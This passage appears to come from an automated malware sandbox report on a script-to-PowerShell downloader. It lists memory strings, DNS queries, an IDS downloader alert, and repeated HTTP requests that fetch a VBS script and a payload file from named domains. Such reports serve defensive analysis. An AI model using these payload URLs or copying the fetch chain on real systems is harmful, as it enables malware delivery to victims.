          Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32: source: powershell.exe, 00000003.00000002.2182806236.000001C49BD5B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000000.00000002.2374596360.00000256F9D83000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: utomation.pdbre& source: powershell.exe, 00000003.00000002.2181445765.000001C49BC58000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb[= source: powershell.exe, 00000003.00000002.2179529206.000001C49B975000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2182639588.000001C49BD09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.2182639588.000001C49BD09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2377549383.00000256FA04A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: indows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2377549383.00000256FA04A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: scorlib.pdblT source: powershell.exe, 00000000.00000002.2377549383.00000256FA04A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Z1Rn.pdb source: powershell.exe, 00000003.00000002.2182169653.000001C49BCEB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb.pdb source: powershell.exe, 00000006.00000002.3477541721.0000028A6DF3F000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.com
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 91.193.42.13 91.193.42.13
          Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233
          Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233
          Source: Joe Sandbox ViewIP Address: 184.171.244.231 184.171.244.231
          Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49747 -> 184.171.244.231:443
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.com
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: www.fornid.com
          Source: global trafficDNS traffic detected: DNS query: www.pineappletech.ae
          Source: global trafficDNS traffic detected: DNS query: www.almrwad.com
          Source: global trafficDNS traffic detected: DNS query: www.erp-royal-crown.info
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:44:51 GMTServer: ApacheP3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyiskQBDC65jNM1FGUnjzPm4df4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZIX3frqFLG65tdbAz3M6ejQ%3D000075; expires=Wed, 25-Dec-2024 09:44:51 GMT; Max-Age=1728000; path=/; domain=www.fornid.com; httponlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:44:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:45:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:45:11 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:45:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:45:23 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:45:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:45:34 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:45:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:45:46 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:45:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:45:58 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:46:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:46:10 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:46:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:46:21 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:46:27 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:46:33 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:46:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:46:45 GMTserver: LiteSpeed
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A56640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A578DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A561B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56B64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56803000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://almrwad.com
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.fornid.com/
          Source: powershell.exe, 00000000.00000002.2377549383.00000256FA01A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A56640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56D8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56304000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56A85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erp-royal-crown.info
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E374D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fornid.com
          Source: powershell.exe, 00000003.00000002.2154679290.000001C483FE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 00000000.00000002.2361683425.00000256F1E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2361683425.00000256F1CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2174560183.000001C493751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467332156.0000028A65C63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467332156.0000028A65B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A55CDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.2154679290.000001C48390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E1C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2154679290.000001C4836E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A55AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.2154679290.000001C48390A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A56640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A578DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A561B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56B64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56803000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.almrwad.com
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A55CDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A56640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56D8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56304000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56A85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.erp-royal-crown.info
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2295236688.00000256E374D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/content/13-international-shipments
          Source: powershell.exe, 00000003.00000002.2154217645.000001C4819FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
          Source: powershell.exe, 00000000.00000002.2376659710.00000256F9E80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co;Q
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3BC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pineappletech.ae
          Source: powershell.exe, 00000003.00000002.2178901425.000001C49B914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://Automation.resources
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E1C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2154679290.000001C4836E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A55AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000003.00000002.2154679290.000001C48390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2154679290.000001C4849F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000003.00000002.2154679290.000001C4849F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
          Source: powershell.exe, 00000006.00000002.3467332156.0000028A65B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000006.00000002.3467332156.0000028A65B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000006.00000002.3467332156.0000028A65B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Istok
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A55CDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E2884000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2154679290.000001C4849F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2154679290.000001C483FE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2154679290.000001C484D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000000.00000002.2361683425.00000256F1E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2361683425.00000256F1CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2174560183.000001C493751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467332156.0000028A65C63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467332156.0000028A65B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: powershell.exe, 00000000.00000002.2295236688.00000256E3773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.c
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.co
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A56640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A561B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A55CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A573B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56803000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3374685515.0000028A56ACF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/w
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/S
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Su
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sub
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subo
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subor
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subord
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordi
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordin
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordine
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordiner
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinere
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordineren
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerend
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerende
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes7
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78
          Source: powershell.exe, 00000006.00000002.3374685515.0000028A57268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.
